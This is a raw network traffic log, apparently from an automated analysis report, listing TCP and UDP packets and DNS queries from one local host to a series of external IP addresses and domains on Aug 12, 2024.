Aug 12, 2024 13:02:40.796062946 CEST	80	54845	85.159.66.93	192.168.2.6
Aug 12, 2024 13:02:45.984040976 CEST	54848	80	192.168.2.6	91.195.240.94
Aug 12, 2024 13:02:45.989011049 CEST	80	54848	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:45.989078045 CEST	54848	80	192.168.2.6	91.195.240.94
Aug 12, 2024 13:02:45.992328882 CEST	54848	80	192.168.2.6	91.195.240.94
Aug 12, 2024 13:02:45.997091055 CEST	80	54848	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:46.832770109 CEST	80	54848	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:46.832858086 CEST	80	54848	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:46.833080053 CEST	54848	80	192.168.2.6	91.195.240.94
Aug 12, 2024 13:02:46.833136082 CEST	80	54848	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:46.833205938 CEST	54848	80	192.168.2.6	91.195.240.94
Aug 12, 2024 13:02:47.508961916 CEST	54848	80	192.168.2.6	91.195.240.94
Aug 12, 2024 13:02:48.567209959 CEST	54849	80	192.168.2.6	91.195.240.94
Aug 12, 2024 13:02:48.572160006 CEST	80	54849	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:48.579149961 CEST	54849	80	192.168.2.6	91.195.240.94
Aug 12, 2024 13:02:48.603087902 CEST	54849	80	192.168.2.6	91.195.240.94
Aug 12, 2024 13:02:48.607913017 CEST	80	54849	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:49.244676113 CEST	80	54849	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:49.244746923 CEST	80	54849	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:49.244836092 CEST	54849	80	192.168.2.6	91.195.240.94
Aug 12, 2024 13:02:50.132164955 CEST	54849	80	192.168.2.6	91.195.240.94
Aug 12, 2024 13:02:51.151083946 CEST	54850	80	192.168.2.6	91.195.240.94
Aug 12, 2024 13:02:51.156183958 CEST	80	54850	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:51.156337023 CEST	54850	80	192.168.2.6	91.195.240.94
Aug 12, 2024 13:02:51.158113003 CEST	54850	80	192.168.2.6	91.195.240.94
Aug 12, 2024 13:02:51.162940025 CEST	80	54850	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:51.163181067 CEST	80	54850	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:51.794361115 CEST	80	54850	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:51.794403076 CEST	80	54850	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:51.794540882 CEST	54850	80	192.168.2.6	91.195.240.94
Aug 12, 2024 13:02:52.663376093 CEST	54850	80	192.168.2.6	91.195.240.94
Aug 12, 2024 13:02:53.682744026 CEST	54851	80	192.168.2.6	91.195.240.94
Aug 12, 2024 13:02:53.687747002 CEST	80	54851	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:53.687824965 CEST	54851	80	192.168.2.6	91.195.240.94
Aug 12, 2024 13:02:53.689719915 CEST	54851	80	192.168.2.6	91.195.240.94
Aug 12, 2024 13:02:53.694653034 CEST	80	54851	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:54.399998903 CEST	80	54851	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:54.400065899 CEST	80	54851	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:54.400088072 CEST	80	54851	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:54.400101900 CEST	80	54851	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:54.400115967 CEST	80	54851	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:54.400130033 CEST	80	54851	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:54.400229931 CEST	80	54851	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:54.400240898 CEST	80	54851	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:54.400254965 CEST	80	54851	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:54.400270939 CEST	80	54851	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:54.400284052 CEST	80	54851	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:54.400290012 CEST	54851	80	192.168.2.6	91.195.240.94
Aug 12, 2024 13:02:54.400520086 CEST	54851	80	192.168.2.6	91.195.240.94
Aug 12, 2024 13:02:54.405219078 CEST	80	54851	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:54.409380913 CEST	54851	80	192.168.2.6	91.195.240.94
Aug 12, 2024 13:02:54.452608109 CEST	80	54851	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:54.452642918 CEST	80	54851	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:54.452658892 CEST	80	54851	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:54.452675104 CEST	80	54851	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:54.452692986 CEST	80	54851	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:54.452846050 CEST	54851	80	192.168.2.6	91.195.240.94
Aug 12, 2024 13:02:54.452846050 CEST	54851	80	192.168.2.6	91.195.240.94
Aug 12, 2024 13:02:54.452944040 CEST	80	54851	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:54.452965975 CEST	80	54851	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:54.453030109 CEST	80	54851	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:54.453038931 CEST	54851	80	192.168.2.6	91.195.240.94
Aug 12, 2024 13:02:54.453353882 CEST	80	54851	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:54.453368902 CEST	54851	80	192.168.2.6	91.195.240.94
Aug 12, 2024 13:02:54.453629971 CEST	54851	80	192.168.2.6	91.195.240.94
Aug 12, 2024 13:02:54.457110882 CEST	54851	80	192.168.2.6	91.195.240.94
Aug 12, 2024 13:02:54.463113070 CEST	80	54851	91.195.240.94	192.168.2.6
Aug 12, 2024 13:02:59.709543943 CEST	54852	80	192.168.2.6	15.197.172.60
Aug 12, 2024 13:02:59.714561939 CEST	80	54852	15.197.172.60	192.168.2.6
Aug 12, 2024 13:02:59.714634895 CEST	54852	80	192.168.2.6	15.197.172.60
Aug 12, 2024 13:02:59.732410908 CEST	54852	80	192.168.2.6	15.197.172.60
Aug 12, 2024 13:02:59.737960100 CEST	80	54852	15.197.172.60	192.168.2.6
Aug 12, 2024 13:03:00.178524017 CEST	80	54852	15.197.172.60	192.168.2.6
Aug 12, 2024 13:03:00.178702116 CEST	54852	80	192.168.2.6	15.197.172.60
Aug 12, 2024 13:03:01.241496086 CEST	54852	80	192.168.2.6	15.197.172.60
Aug 12, 2024 13:03:01.490735054 CEST	80	54852	15.197.172.60	192.168.2.6
Aug 12, 2024 13:03:02.260103941 CEST	54853	80	192.168.2.6	15.197.172.60
Aug 12, 2024 13:03:02.265153885 CEST	80	54853	15.197.172.60	192.168.2.6
Aug 12, 2024 13:03:02.265292883 CEST	54853	80	192.168.2.6	15.197.172.60
Aug 12, 2024 13:03:02.267465115 CEST	54853	80	192.168.2.6	15.197.172.60
Aug 12, 2024 13:03:02.272764921 CEST	80	54853	15.197.172.60	192.168.2.6
Aug 12, 2024 13:03:02.728223085 CEST	80	54853	15.197.172.60	192.168.2.6
Aug 12, 2024 13:03:02.728986979 CEST	54853	80	192.168.2.6	15.197.172.60
Aug 12, 2024 13:03:03.772815943 CEST	54853	80	192.168.2.6	15.197.172.60
Aug 12, 2024 13:03:03.777743101 CEST	80	54853	15.197.172.60	192.168.2.6
Aug 12, 2024 13:03:04.791850090 CEST	54854	80	192.168.2.6	15.197.172.60
Aug 12, 2024 13:03:04.797199011 CEST	80	54854	15.197.172.60	192.168.2.6
Aug 12, 2024 13:03:04.797317028 CEST	54854	80	192.168.2.6	15.197.172.60
Aug 12, 2024 13:03:04.799329042 CEST	54854	80	192.168.2.6	15.197.172.60
Aug 12, 2024 13:03:04.804423094 CEST	80	54854	15.197.172.60	192.168.2.6
Aug 12, 2024 13:03:04.804557085 CEST	80	54854	15.197.172.60	192.168.2.6
Aug 12, 2024 13:03:05.257909060 CEST	80	54854	15.197.172.60	192.168.2.6
Aug 12, 2024 13:03:05.257972956 CEST	54854	80	192.168.2.6	15.197.172.60
Aug 12, 2024 13:03:06.304020882 CEST	54854	80	192.168.2.6	15.197.172.60
Aug 12, 2024 13:03:06.309046030 CEST	80	54854	15.197.172.60	192.168.2.6
Aug 12, 2024 13:03:07.323093891 CEST	54855	80	192.168.2.6	15.197.172.60
Aug 12, 2024 13:03:07.328126907 CEST	80	54855	15.197.172.60	192.168.2.6
Aug 12, 2024 13:03:07.328191996 CEST	54855	80	192.168.2.6	15.197.172.60
Aug 12, 2024 13:03:07.330323935 CEST	54855	80	192.168.2.6	15.197.172.60
Aug 12, 2024 13:03:07.335263014 CEST	80	54855	15.197.172.60	192.168.2.6
Aug 12, 2024 13:03:07.806813955 CEST	80	54855	15.197.172.60	192.168.2.6
Aug 12, 2024 13:03:07.806868076 CEST	80	54855	15.197.172.60	192.168.2.6
Aug 12, 2024 13:03:07.807163954 CEST	54855	80	192.168.2.6	15.197.172.60
Aug 12, 2024 13:03:07.809618950 CEST	54855	80	192.168.2.6	15.197.172.60
Aug 12, 2024 13:03:07.814425945 CEST	80	54855	15.197.172.60	192.168.2.6
Aug 12, 2024 13:03:13.125080109 CEST	54856	80	192.168.2.6	66.29.149.46
Aug 12, 2024 13:03:13.130911112 CEST	80	54856	66.29.149.46	192.168.2.6
Aug 12, 2024 13:03:13.131023884 CEST	54856	80	192.168.2.6	66.29.149.46
Aug 12, 2024 13:03:13.137077093 CEST	54856	80	192.168.2.6	66.29.149.46
Aug 12, 2024 13:03:13.143512011 CEST	80	54856	66.29.149.46	192.168.2.6
Aug 12, 2024 13:03:13.733136892 CEST	80	54856	66.29.149.46	192.168.2.6
Aug 12, 2024 13:03:13.733161926 CEST	80	54856	66.29.149.46	192.168.2.6
Aug 12, 2024 13:03:13.733222961 CEST	54856	80	192.168.2.6	66.29.149.46
Aug 12, 2024 13:03:14.647814989 CEST	54856	80	192.168.2.6	66.29.149.46
Aug 12, 2024 13:03:15.666632891 CEST	54857	80	192.168.2.6	66.29.149.46
Aug 12, 2024 13:03:15.671478987 CEST	80	54857	66.29.149.46	192.168.2.6
Aug 12, 2024 13:03:15.671546936 CEST	54857	80	192.168.2.6	66.29.149.46
Aug 12, 2024 13:03:15.675961971 CEST	54857	80	192.168.2.6	66.29.149.46
Aug 12, 2024 13:03:15.680728912 CEST	80	54857	66.29.149.46	192.168.2.6
Aug 12, 2024 13:03:16.298863888 CEST	80	54857	66.29.149.46	192.168.2.6
Aug 12, 2024 13:03:16.298916101 CEST	80	54857	66.29.149.46	192.168.2.6
Aug 12, 2024 13:03:16.299092054 CEST	54857	80	192.168.2.6	66.29.149.46
Aug 12, 2024 13:03:17.179477930 CEST	54857	80	192.168.2.6	66.29.149.46
Aug 12, 2024 13:03:18.197794914 CEST	54858	80	192.168.2.6	66.29.149.46
Aug 12, 2024 13:03:18.202864885 CEST	80	54858	66.29.149.46	192.168.2.6
Aug 12, 2024 13:03:18.202965021 CEST	54858	80	192.168.2.6	66.29.149.46
Aug 12, 2024 13:03:18.204982042 CEST	54858	80	192.168.2.6	66.29.149.46
Aug 12, 2024 13:03:18.209822893 CEST	80	54858	66.29.149.46	192.168.2.6
Aug 12, 2024 13:03:18.209979057 CEST	80	54858	66.29.149.46	192.168.2.6
Aug 12, 2024 13:03:18.799501896 CEST	80	54858	66.29.149.46	192.168.2.6
Aug 12, 2024 13:03:18.799601078 CEST	80	54858	66.29.149.46	192.168.2.6
Aug 12, 2024 13:03:18.799721003 CEST	54858	80	192.168.2.6	66.29.149.46
Aug 12, 2024 13:03:19.710316896 CEST	54858	80	192.168.2.6	66.29.149.46
Aug 12, 2024 13:03:20.733882904 CEST	54859	80	192.168.2.6	66.29.149.46
Aug 12, 2024 13:03:20.738877058 CEST	80	54859	66.29.149.46	192.168.2.6
Aug 12, 2024 13:03:20.739011049 CEST	54859	80	192.168.2.6	66.29.149.46
Aug 12, 2024 13:03:20.740803003 CEST	54859	80	192.168.2.6	66.29.149.46
Aug 12, 2024 13:03:20.745640993 CEST	80	54859	66.29.149.46	192.168.2.6
Aug 12, 2024 13:03:21.353380919 CEST	80	54859	66.29.149.46	192.168.2.6
Aug 12, 2024 13:03:21.353653908 CEST	80	54859	66.29.149.46	192.168.2.6
Aug 12, 2024 13:03:21.353702068 CEST	54859	80	192.168.2.6	66.29.149.46
Aug 12, 2024 13:03:21.357381105 CEST	54859	80	192.168.2.6	66.29.149.46
Aug 12, 2024 13:03:21.362415075 CEST	80	54859	66.29.149.46	192.168.2.6
Aug 12, 2024 13:03:26.458162069 CEST	54860	80	192.168.2.6	195.110.124.133
Aug 12, 2024 13:03:26.464251041 CEST	80	54860	195.110.124.133	192.168.2.6
Aug 12, 2024 13:03:26.464451075 CEST	54860	80	192.168.2.6	195.110.124.133
Aug 12, 2024 13:03:26.466655016 CEST	54860	80	192.168.2.6	195.110.124.133
Aug 12, 2024 13:03:26.474740028 CEST	80	54860	195.110.124.133	192.168.2.6
Aug 12, 2024 13:03:27.167577982 CEST	80	54860	195.110.124.133	192.168.2.6
Aug 12, 2024 13:03:27.168102026 CEST	80	54860	195.110.124.133	192.168.2.6
Aug 12, 2024 13:03:27.168416023 CEST	54860	80	192.168.2.6	195.110.124.133
Aug 12, 2024 13:03:27.976120949 CEST	54860	80	192.168.2.6	195.110.124.133
Aug 12, 2024 13:03:28.994424105 CEST	54861	80	192.168.2.6	195.110.124.133
Aug 12, 2024 13:03:29.117773056 CEST	80	54861	195.110.124.133	192.168.2.6
Aug 12, 2024 13:03:29.119209051 CEST	54861	80	192.168.2.6	195.110.124.133
Aug 12, 2024 13:03:29.123195887 CEST	54861	80	192.168.2.6	195.110.124.133
Aug 12, 2024 13:03:29.128211021 CEST	80	54861	195.110.124.133	192.168.2.6
Aug 12, 2024 13:03:29.798368931 CEST	80	54861	195.110.124.133	192.168.2.6
Aug 12, 2024 13:03:29.798392057 CEST	80	54861	195.110.124.133	192.168.2.6
Aug 12, 2024 13:03:29.798460007 CEST	54861	80	192.168.2.6	195.110.124.133
Aug 12, 2024 13:03:30.635407925 CEST	54861	80	192.168.2.6	195.110.124.133
Aug 12, 2024 13:03:31.651521921 CEST	54862	80	192.168.2.6	195.110.124.133
Aug 12, 2024 13:03:31.656583071 CEST	80	54862	195.110.124.133	192.168.2.6
Aug 12, 2024 13:03:31.656688929 CEST	54862	80	192.168.2.6	195.110.124.133
Aug 12, 2024 13:03:31.658974886 CEST	54862	80	192.168.2.6	195.110.124.133
Aug 12, 2024 13:03:31.663927078 CEST	80	54862	195.110.124.133	192.168.2.6
Aug 12, 2024 13:03:31.664052010 CEST	80	54862	195.110.124.133	192.168.2.6
Aug 12, 2024 13:03:32.431184053 CEST	80	54862	195.110.124.133	192.168.2.6
Aug 12, 2024 13:03:32.431214094 CEST	80	54862	195.110.124.133	192.168.2.6
Aug 12, 2024 13:03:32.431329012 CEST	54862	80	192.168.2.6	195.110.124.133
Aug 12, 2024 13:03:33.163539886 CEST	54862	80	192.168.2.6	195.110.124.133
Aug 12, 2024 13:03:34.181930065 CEST	54863	80	192.168.2.6	195.110.124.133
Aug 12, 2024 13:03:34.187020063 CEST	80	54863	195.110.124.133	192.168.2.6
Aug 12, 2024 13:03:34.187149048 CEST	54863	80	192.168.2.6	195.110.124.133
Aug 12, 2024 13:03:34.189029932 CEST	54863	80	192.168.2.6	195.110.124.133
Aug 12, 2024 13:03:34.194005013 CEST	80	54863	195.110.124.133	192.168.2.6
Aug 12, 2024 13:03:34.868436098 CEST	80	54863	195.110.124.133	192.168.2.6
Aug 12, 2024 13:03:34.868566990 CEST	80	54863	195.110.124.133	192.168.2.6
Aug 12, 2024 13:03:34.869178057 CEST	54863	80	192.168.2.6	195.110.124.133
Aug 12, 2024 13:03:34.880450010 CEST	54863	80	192.168.2.6	195.110.124.133
Aug 12, 2024 13:03:34.885210991 CEST	80	54863	195.110.124.133	192.168.2.6
Aug 12, 2024 13:03:40.379808903 CEST	54864	80	192.168.2.6	15.197.240.20
Aug 12, 2024 13:03:40.384668112 CEST	80	54864	15.197.240.20	192.168.2.6
Aug 12, 2024 13:03:40.385643959 CEST	54864	80	192.168.2.6	15.197.240.20
Aug 12, 2024 13:03:40.389154911 CEST	54864	80	192.168.2.6	15.197.240.20
Aug 12, 2024 13:03:40.395143032 CEST	80	54864	15.197.240.20	192.168.2.6
Aug 12, 2024 13:03:40.854549885 CEST	80	54864	15.197.240.20	192.168.2.6
Aug 12, 2024 13:03:40.854640007 CEST	54864	80	192.168.2.6	15.197.240.20
Aug 12, 2024 13:03:41.898051023 CEST	54864	80	192.168.2.6	15.197.240.20
Aug 12, 2024 13:03:41.902980089 CEST	80	54864	15.197.240.20	192.168.2.6
Aug 12, 2024 13:03:42.916560888 CEST	54865	80	192.168.2.6	15.197.240.20
Aug 12, 2024 13:03:42.921539068 CEST	80	54865	15.197.240.20	192.168.2.6
Aug 12, 2024 13:03:42.925142050 CEST	54865	80	192.168.2.6	15.197.240.20
Aug 12, 2024 13:03:42.929091930 CEST	54865	80	192.168.2.6	15.197.240.20
Aug 12, 2024 13:03:42.934112072 CEST	80	54865	15.197.240.20	192.168.2.6
Aug 12, 2024 13:03:43.382651091 CEST	80	54865	15.197.240.20	192.168.2.6
Aug 12, 2024 13:03:43.382725000 CEST	54865	80	192.168.2.6	15.197.240.20
Aug 12, 2024 13:03:44.429056883 CEST	54865	80	192.168.2.6	15.197.240.20
Aug 12, 2024 13:03:44.434109926 CEST	80	54865	15.197.240.20	192.168.2.6
Aug 12, 2024 13:03:45.448736906 CEST	54866	80	192.168.2.6	15.197.240.20
Aug 12, 2024 13:03:45.453783035 CEST	80	54866	15.197.240.20	192.168.2.6
Aug 12, 2024 13:03:45.453860998 CEST	54866	80	192.168.2.6	15.197.240.20
Aug 12, 2024 13:03:45.456237078 CEST	54866	80	192.168.2.6	15.197.240.20
Aug 12, 2024 13:03:45.461237907 CEST	80	54866	15.197.240.20	192.168.2.6
Aug 12, 2024 13:03:45.461268902 CEST	80	54866	15.197.240.20	192.168.2.6
Aug 12, 2024 13:03:45.918334961 CEST	80	54866	15.197.240.20	192.168.2.6
Aug 12, 2024 13:03:45.918404102 CEST	54866	80	192.168.2.6	15.197.240.20
Aug 12, 2024 13:03:46.960333109 CEST	54866	80	192.168.2.6	15.197.240.20
Aug 12, 2024 13:03:46.965526104 CEST	80	54866	15.197.240.20	192.168.2.6
Aug 12, 2024 13:03:47.984585047 CEST	54867	80	192.168.2.6	15.197.240.20
Aug 12, 2024 13:03:47.989373922 CEST	80	54867	15.197.240.20	192.168.2.6
Aug 12, 2024 13:03:47.989459991 CEST	54867	80	192.168.2.6	15.197.240.20
Aug 12, 2024 13:03:47.993971109 CEST	54867	80	192.168.2.6	15.197.240.20
Aug 12, 2024 13:03:47.998789072 CEST	80	54867	15.197.240.20	192.168.2.6
Aug 12, 2024 13:03:48.455369949 CEST	80	54867	15.197.240.20	192.168.2.6
Aug 12, 2024 13:03:48.455564022 CEST	80	54867	15.197.240.20	192.168.2.6
Aug 12, 2024 13:03:48.461240053 CEST	54867	80	192.168.2.6	15.197.240.20
Aug 12, 2024 13:03:48.461977959 CEST	54867	80	192.168.2.6	15.197.240.20
Aug 12, 2024 13:03:48.467776060 CEST	80	54867	15.197.240.20	192.168.2.6
Aug 12, 2024 13:04:01.982187033 CEST	54870	80	192.168.2.6	217.196.55.202
Aug 12, 2024 13:04:01.987153053 CEST	80	54870	217.196.55.202	192.168.2.6
Aug 12, 2024 13:04:01.987353086 CEST	54870	80	192.168.2.6	217.196.55.202
Aug 12, 2024 13:04:01.989299059 CEST	54870	80	192.168.2.6	217.196.55.202
Aug 12, 2024 13:04:01.994360924 CEST	80	54870	217.196.55.202	192.168.2.6
Aug 12, 2024 13:04:02.564764977 CEST	80	54870	217.196.55.202	192.168.2.6
Aug 12, 2024 13:04:02.568169117 CEST	80	54870	217.196.55.202	192.168.2.6
Aug 12, 2024 13:04:02.568326950 CEST	54870	80	192.168.2.6	217.196.55.202
Aug 12, 2024 13:04:03.491569042 CEST	54870	80	192.168.2.6	217.196.55.202
Aug 12, 2024 13:04:04.511097908 CEST	54871	80	192.168.2.6	217.196.55.202
Aug 12, 2024 13:04:04.516180038 CEST	80	54871	217.196.55.202	192.168.2.6
Aug 12, 2024 13:04:04.516352892 CEST	54871	80	192.168.2.6	217.196.55.202
Aug 12, 2024 13:04:04.518501043 CEST	54871	80	192.168.2.6	217.196.55.202
Aug 12, 2024 13:04:04.523986101 CEST	80	54871	217.196.55.202	192.168.2.6
Aug 12, 2024 13:04:05.093588114 CEST	80	54871	217.196.55.202	192.168.2.6
Aug 12, 2024 13:04:05.093782902 CEST	80	54871	217.196.55.202	192.168.2.6
Aug 12, 2024 13:04:05.094062090 CEST	54871	80	192.168.2.6	217.196.55.202
Aug 12, 2024 13:04:06.022799969 CEST	54871	80	192.168.2.6	217.196.55.202
Aug 12, 2024 13:04:07.045207977 CEST	54872	80	192.168.2.6	217.196.55.202
Aug 12, 2024 13:04:07.050532103 CEST	80	54872	217.196.55.202	192.168.2.6
Aug 12, 2024 13:04:07.052666903 CEST	54872	80	192.168.2.6	217.196.55.202
Aug 12, 2024 13:04:07.056526899 CEST	54872	80	192.168.2.6	217.196.55.202
Aug 12, 2024 13:04:07.062509060 CEST	80	54872	217.196.55.202	192.168.2.6
Aug 12, 2024 13:04:07.062834978 CEST	80	54872	217.196.55.202	192.168.2.6
Aug 12, 2024 13:04:07.643873930 CEST	80	54872	217.196.55.202	192.168.2.6
Aug 12, 2024 13:04:07.644026041 CEST	80	54872	217.196.55.202	192.168.2.6
Aug 12, 2024 13:04:07.644078970 CEST	54872	80	192.168.2.6	217.196.55.202
Aug 12, 2024 13:04:08.571628094 CEST	54872	80	192.168.2.6	217.196.55.202
Aug 12, 2024 13:04:09.613967896 CEST	54873	80	192.168.2.6	217.196.55.202
Aug 12, 2024 13:04:09.737324953 CEST	80	54873	217.196.55.202	192.168.2.6
Aug 12, 2024 13:04:09.737426996 CEST	54873	80	192.168.2.6	217.196.55.202
Aug 12, 2024 13:04:09.739938974 CEST	54873	80	192.168.2.6	217.196.55.202
Aug 12, 2024 13:04:09.744967937 CEST	80	54873	217.196.55.202	192.168.2.6
Aug 12, 2024 13:04:10.304749012 CEST	80	54873	217.196.55.202	192.168.2.6
Aug 12, 2024 13:04:10.305315971 CEST	80	54873	217.196.55.202	192.168.2.6
Aug 12, 2024 13:04:10.305368900 CEST	54873	80	192.168.2.6	217.196.55.202
Aug 12, 2024 13:04:10.307742119 CEST	54873	80	192.168.2.6	217.196.55.202
Aug 12, 2024 13:04:10.312525988 CEST	80	54873	217.196.55.202	192.168.2.6
Aug 12, 2024 13:04:15.641813040 CEST	54874	80	192.168.2.6	199.59.243.226
Aug 12, 2024 13:04:15.646761894 CEST	80	54874	199.59.243.226	192.168.2.6
Aug 12, 2024 13:04:15.646869898 CEST	54874	80	192.168.2.6	199.59.243.226
Aug 12, 2024 13:04:15.649187088 CEST	54874	80	192.168.2.6	199.59.243.226
Aug 12, 2024 13:04:15.654156923 CEST	80	54874	199.59.243.226	192.168.2.6
Aug 12, 2024 13:04:16.122726917 CEST	80	54874	199.59.243.226	192.168.2.6
Aug 12, 2024 13:04:16.122755051 CEST	80	54874	199.59.243.226	192.168.2.6
Aug 12, 2024 13:04:16.122772932 CEST	80	54874	199.59.243.226	192.168.2.6
Aug 12, 2024 13:04:16.122809887 CEST	54874	80	192.168.2.6	199.59.243.226
Aug 12, 2024 13:04:16.122915983 CEST	54874	80	192.168.2.6	199.59.243.226
Aug 12, 2024 13:04:17.163476944 CEST	54874	80	192.168.2.6	199.59.243.226
Aug 12, 2024 13:04:19.541215897 CEST	54875	80	192.168.2.6	199.59.243.226
Aug 12, 2024 13:04:19.546403885 CEST	80	54875	199.59.243.226	192.168.2.6
Aug 12, 2024 13:04:19.546801090 CEST	54875	80	192.168.2.6	199.59.243.226
Aug 12, 2024 13:04:19.549057007 CEST	54875	80	192.168.2.6	199.59.243.226
Aug 12, 2024 13:04:19.557656050 CEST	80	54875	199.59.243.226	192.168.2.6
Aug 12, 2024 13:04:20.034641981 CEST	80	54875	199.59.243.226	192.168.2.6
Aug 12, 2024 13:04:20.034663916 CEST	80	54875	199.59.243.226	192.168.2.6
Aug 12, 2024 13:04:20.034729004 CEST	80	54875	199.59.243.226	192.168.2.6
Aug 12, 2024 13:04:20.034782887 CEST	54875	80	192.168.2.6	199.59.243.226
Aug 12, 2024 13:04:20.034900904 CEST	54875	80	192.168.2.6	199.59.243.226

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 12, 2024 13:00:31.279787064 CEST	53	59327	1.1.1.1	192.168.2.6
Aug 12, 2024 13:00:38.966507912 CEST	51935	53	192.168.2.6	1.1.1.1
Aug 12, 2024 13:00:39.976033926 CEST	51935	53	192.168.2.6	1.1.1.1
Aug 12, 2024 13:00:40.132046938 CEST	53	51935	1.1.1.1	192.168.2.6
Aug 12, 2024 13:00:40.134618044 CEST	53	51935	1.1.1.1	192.168.2.6
Aug 12, 2024 13:00:56.074095964 CEST	56655	53	192.168.2.6	1.1.1.1
Aug 12, 2024 13:00:56.406871080 CEST	53	56655	1.1.1.1	192.168.2.6
Aug 12, 2024 13:01:09.652002096 CEST	51069	53	192.168.2.6	1.1.1.1
Aug 12, 2024 13:01:10.011419058 CEST	53	51069	1.1.1.1	192.168.2.6
Aug 12, 2024 13:01:23.495894909 CEST	51153	53	192.168.2.6	1.1.1.1
Aug 12, 2024 13:01:23.622721910 CEST	53	51153	1.1.1.1	192.168.2.6
Aug 12, 2024 13:01:31.682344913 CEST	63619	53	192.168.2.6	1.1.1.1
Aug 12, 2024 13:01:32.178788900 CEST	53	63619	1.1.1.1	192.168.2.6
Aug 12, 2024 13:02:45.811439037 CEST	60129	53	192.168.2.6	1.1.1.1
Aug 12, 2024 13:02:45.979935884 CEST	53	60129	1.1.1.1	192.168.2.6
Aug 12, 2024 13:02:59.464342117 CEST	51387	53	192.168.2.6	1.1.1.1
Aug 12, 2024 13:02:59.698348045 CEST	53	51387	1.1.1.1	192.168.2.6
Aug 12, 2024 13:03:12.823005915 CEST	59376	53	192.168.2.6	1.1.1.1
Aug 12, 2024 13:03:13.117331028 CEST	53	59376	1.1.1.1	192.168.2.6
Aug 12, 2024 13:03:26.370512009 CEST	49554	53	192.168.2.6	1.1.1.1
Aug 12, 2024 13:03:26.455055952 CEST	53	49554	1.1.1.1	192.168.2.6
Aug 12, 2024 13:03:39.885907888 CEST	49804	53	192.168.2.6	1.1.1.1
Aug 12, 2024 13:03:40.374319077 CEST	53	49804	1.1.1.1	192.168.2.6
Aug 12, 2024 13:03:53.490725994 CEST	49498	53	192.168.2.6	1.1.1.1
Aug 12, 2024 13:03:53.843091965 CEST	53	49498	1.1.1.1	192.168.2.6
Aug 12, 2024 13:04:01.916872978 CEST	51980	53	192.168.2.6	1.1.1.1
Aug 12, 2024 13:04:01.979706049 CEST	53	51980	1.1.1.1	192.168.2.6
Aug 12, 2024 13:04:15.323456049 CEST	49930	53	192.168.2.6	1.1.1.1
Aug 12, 2024 13:04:15.638817072 CEST	53	49930	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 12, 2024 13:00:38.966507912 CEST	192.168.2.6	1.1.1.1	0xad6	Standard query (0)	www.3xfootball.com	A (IP address)	IN (0x0001)	false
Aug 12, 2024 13:00:39.976033926 CEST	192.168.2.6	1.1.1.1	0xad6	Standard query (0)	www.3xfootball.com	A (IP address)	IN (0x0001)	false
Aug 12, 2024 13:00:56.074095964 CEST	192.168.2.6	1.1.1.1	0xd98b	Standard query (0)	www.kasegitai.tokyo	A (IP address)	IN (0x0001)	false
Aug 12, 2024 13:01:09.652002096 CEST	192.168.2.6	1.1.1.1	0x14af	Standard query (0)	www.goldenjade-travel.com	A (IP address)	IN (0x0001)	false
Aug 12, 2024 13:01:23.495894909 CEST	192.168.2.6	1.1.1.1	0xac9	Standard query (0)	www.antonio-vivaldi.mobi	A (IP address)	IN (0x0001)	false
Aug 12, 2024 13:01:31.682344913 CEST	192.168.2.6	1.1.1.1	0x8d36	Standard query (0)	www.magmadokum.com	A (IP address)	IN (0x0001)	false
Aug 12, 2024 13:02:45.811439037 CEST	192.168.2.6	1.1.1.1	0xc2e0	Standard query (0)	www.rssnewscast.com	A (IP address)	IN (0x0001)	false
Aug 12, 2024 13:02:59.464342117 CEST	192.168.2.6	1.1.1.1	0xf15b	Standard query (0)	www.liangyuen528.com	A (IP address)	IN (0x0001)	false
Aug 12, 2024 13:03:12.823005915 CEST	192.168.2.6	1.1.1.1	0x53d8	Standard query (0)	www.techchains.info	A (IP address)	IN (0x0001)	false
Aug 12, 2024 13:03:26.370512009 CEST	192.168.2.6	1.1.1.1	0x9f49	Standard query (0)	www.elettrosistemista.zip	A (IP address)	IN (0x0001)	false
Aug 12, 2024 13:03:39.885907888 CEST	192.168.2.6	1.1.1.1	0x94a1	Standard query (0)	www.donnavariedades.com	A (IP address)	IN (0x0001)	false
Aug 12, 2024 13:03:53.490725994 CEST	192.168.2.6	1.1.1.1	0x1e47	Standard query (0)	www.660danm.top	A (IP address)	IN (0x0001)	false
Aug 12, 2024 13:04:01.916872978 CEST	192.168.2.6	1.1.1.1	0x6392	Standard query (0)	www.empowermedeco.com	A (IP address)	IN (0x0001)	false
